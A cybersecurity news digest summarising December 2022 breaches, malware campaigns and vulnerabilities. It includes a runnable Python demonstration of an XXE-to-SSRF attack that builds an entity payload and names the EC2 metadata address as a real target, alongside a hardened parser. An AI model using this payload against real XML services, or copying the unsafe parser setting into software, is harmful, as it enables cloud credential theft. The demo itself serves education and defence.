
Cyware Daily Threat Intelligence


Daily Threat Briefing Dec 16, 2022

Are your devices running on default credentials? Microsoft has reported a new botnet, MCCrash, that takes over such devices and has an unusual spreading mechanism: even if the malware is removed from the initially infected PC, it can persist on unmanaged IoT devices elsewhere on the network. BrickLink, the world's largest online community of LEGO fans, was found to have two vulnerabilities exposing it to Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) attacks.

Beware of fake Windows installers. The government of Ukraine was recently targeted with malicious ISO files disguised as Windows 10 installers. The operation appears to be espionage rather than a financially motivated intrusion.


Top Breaches Reported in the Last 24 Hours

Crypto firm suffered third-party incident

Crypto exchange Gemini disclosed that its customers were targeted with phishing after attackers obtained their personal information from an unnamed third-party vendor. Security researchers found phone numbers and email addresses belonging to 5.7 million Gemini users offered for sale on several hacker forums. Gemini said its own systems and customer account data were not affected.

Potential breach at Social Blade

Cybercriminals gained access to the network of social media analytics platform Social Blade, stole data, and put it up for sale on the dark web. The attackers are believed to have exploited a vulnerability in the company's website to reach its database. The stolen data may include email addresses, password hashes, client IDs, authentication tokens for Business API users, and other non-personal and internal data.

Top Malware Reported in the Last 24 Hours

New Agenda ransomware sample

Trend Micro analysts spotted a sample of the Agenda ransomware written in Rust. The actors appear to have ported the earlier version, originally written in Go, and customized the new build for its intended victims. The Rust variant also uses intermittent encryption, encrypting only parts of each file, to speed up encryption and evade detection.

MCCrash - New botnet in town

Microsoft unearthed MCCrash, a cross-platform botnet used to launch DDoS attacks against private Minecraft servers. Microsoft tracks the activity cluster as DEV-1028. The initial infection comes from fake software downloads on Windows machines; from there, the malware spreads by trying default credentials against internet-exposed, SSH-enabled devices, so it also infects Linux-based and IoT devices.

Fake Windows 10 installers

The UNC4166 threat group recently targeted Ukrainian government entities with trojanized ISO files imitating legitimate Windows 10 installers. Once a machine is compromised, the installers drop several backdoors, including Stowaway, Beacon, and Sparepart, for persistence. The malware can transfer files, steal data, and execute arbitrary commands.

MirrorStealer by MirrorFace

The MirrorFace hacker group has spent weeks targeting Japanese politicians with a new custom malware, dubbed MirrorStealer, cybersecurity firm ESET revealed. The information-stealing payload was deployed alongside the group's signature backdoor, LODEINFO, which handled communication with a C2 server belonging to APT10 infrastructure.

Top Vulnerabilities Reported in the Last 24 Hours

API bugs in LEGO website

Two API security flaws were found in BrickLink, the largest online LEGO fan community, with over a million registered members. The first was an XSS bug that lets an attacker execute malicious script in a victim's browser via a specially crafted link. The second was an XML External Entity (XXE) injection bug that enabled an SSRF attack and leaked the server's AWS EC2 tokens.
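The XXE-to-SSRF chain described above, as an added example that is not BrickLink's code or the researchers' proof of concept: a parser that resolves external general entities fetches whatever URL the attacker names in a DOCTYPE, so a file:// URL reads local files and an http:// URL pointed at the cloud metadata service (169.254.169.254 on EC2) becomes SSRF and leaks instance credentials. The XML documents, the `<search><name>` format and the fake credential file are all constructed for this example; the demo uses a temporary local file in place of the metadata endpoint so it runs offline, and assumes a POSIX path. The hardened parser keeps entity expansion off and refuses any DOCTYPE outright.

```python
"""XXE -> SSRF demonstration with Python's standard-library SAX parser.

parse_unsafe() enables external general entities, so an attacker-controlled
<!ENTITY ... SYSTEM "..."> is fetched by the parser itself.  parse_hardened()
keeps entity expansion off and rejects any DOCTYPE.  All names and the sample
documents below are constructed for this example.
"""
import io
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


class _NameCollector(ContentHandler):
    """Collects the text of the <name> element of a (constructed) user-search document."""

    def __init__(self):
        super().__init__()
        self._in_name = False
        self.parts = []

    def startElement(self, tag, attrs):
        if tag == "name":
            self._in_name = True

    def endElement(self, tag):
        if tag == "name":
            self._in_name = False

    def characters(self, content):
        if self._in_name:
            self.parts.append(content)


class _RejectDoctype:
    """Lexical handler that aborts parsing as soon as a DOCTYPE is seen."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not allowed: %r" % name)

    # The SAX parser wires these callbacks too, so they must exist.
    def endDTD(self):
        pass

    def comment(self, text):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_unsafe(xml_bytes: bytes) -> str:
    """Vulnerable: external general entities are resolved by the parser (XXE)."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the XXE-enabling switch
    collector = _NameCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_hardened(xml_bytes: bytes) -> str:
    """Hardened: no external entities of any kind, and no DOCTYPE at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    parser.setProperty(handler.property_lexical_handler, _RejectDoctype())
    collector = _NameCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def write_fake_credential_file() -> str:
    """Stand-in for a cloud metadata/credential endpoint; a local file so the demo runs offline."""
    f = tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False)
    f.write("AKIA-CONSTRUCTED-NOT-A-REAL-KEY")  # constructed value, not a real key
    f.close()
    return f.name


def xxe_payload(target_url: str) -> bytes:
    """Attacker document: <name> expands to whatever the parser fetches from target_url."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE search [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        "<search><name>&xxe;</name></search>" % target_url
    ).encode()


BENIGN = b'<?xml version="1.0"?><search><name>alice</name></search>'


def demo() -> dict:
    """Run both parsers over the attack payload and a benign document."""
    path = write_fake_credential_file()
    # A real attack would use e.g. http://169.254.169.254/... to reach instance metadata.
    payload = xxe_payload("file://" + path)
    result = {"unsafe": parse_unsafe(payload), "hardened": None, "benign": parse_hardened(BENIGN)}
    try:
        parse_hardened(payload)
    except ValueError as exc:
        result["hardened"] = str(exc)
    return result


if __name__ == "__main__":
    print(demo())
```

The unsafe parser returns the contents of the credential file inside the `<name>` field, which is exactly how a reflected search result would carry stolen metadata back to the attacker. Python's own SAX default has been external_ges=False since 3.7.1, so the vulnerable path here had to be switched on explicitly; for any other XML stack, treat DOCTYPE rejection as the check, since entity-resolution defaults vary by library.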

Updates for Siemens and Schneider Electric out

Siemens and Schneider Electric issued patches for more than 140 flaws in their December 2022 Patch Tuesday releases. One Siemens advisory covers more than 80 OpenSSL and OpenSSH vulnerabilities in Scalance X-200RNA switches. A key Schneider Electric advisory patches four critical- and high-severity bugs in its APC Easy UPS Online monitoring software.
